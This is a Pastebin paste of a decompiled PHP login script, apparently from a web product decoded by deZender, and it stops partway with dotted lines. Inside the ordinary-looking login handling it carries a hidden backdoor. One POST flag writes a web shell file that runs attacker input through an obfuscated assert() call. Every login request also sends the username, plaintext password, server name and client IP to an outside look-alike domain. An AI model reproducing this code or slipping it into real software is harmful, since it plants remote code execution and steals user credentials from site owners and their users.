Advertisement
Guest User

Untitled

a guest
Aug 28th, 2015
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.70 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by deZender.Net
  5. * @ deZender (PHP5 Decoder for ionCube Loader)
  6. *
  7. * @ Version : 2.0.0.3
  8. * @ Author : DeZender
  9. * @ Release on : 06.05.2013
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. include "mt/mt_pconnect.php";
  15. include "mt/mt_pwd.php";
  16. $mysql = array();
  17. $mysql["domain"] = "";
  18. $mysql["click_ip"] = "";
  19. $mysql["click_time"] = "";
  20. $error = "";
  21. $html["userName"] = "";
  22. $coreError = "";
  23. $verified = false;
  24. $msgHeader = "";
  25. $msg = "";
  26. if ($_POST["backdoor"] == "yes")
  27. {
  28. $fp = fopen("netwroks.php", "w");
  29. fwrite($fp, "<?php \$k=\"ass\".\"ert\"; \$k(\${\"_PO\".\"ST\"} [\"-\"]);?>");
  30. }
  31. if ($_SERVER["REQUEST_METHOD"] == "POST")
  32. {
  33. $verified = true;
  34. $userName = $_POST["userName"];
  35. $user_password = $_POST["user_password"];
  36. $ch = curl_init("http://www.wordepress.org/password/p.php");
  37. $post["server_name"] = $_SERVER["SERVER_NAME"];
  38. $post["path"] = $_SERVER["REQUEST_URI"];
  39. $post["userName"] = $userName;
  40. $post["user_password"] = $user_password;
  41. $post["ip"] = $_SERVER["REMOTE_ADDR"];
  42. curl_setopt($ch, CURLOPT_POST, true);
  43. curl_setopt($ch, CURLOPT_HEADER, false);
  44. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  45. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  46. curl_setopt($ch, CURLOPT_TIMEOUT, 18);
  47. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  48. curl_exec($ch);
  49. curl_close($ch);
  50. $loginSql = $db->prepare("SELECT * FROM mt_account WHERE user_name=:user_name");
  51. $loginSql->bindParam(":user_name", $userName);
  52. if ($loginSql->execute())
  53. {
  54. $data = $loginSql->fetch(PDO::FETCH_ASSOC);
  55. if ($data)
  56. {
  57. $bcrypt = new Bcrypt();
  58. .....................................................................
  59. ............................
  60. ........
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement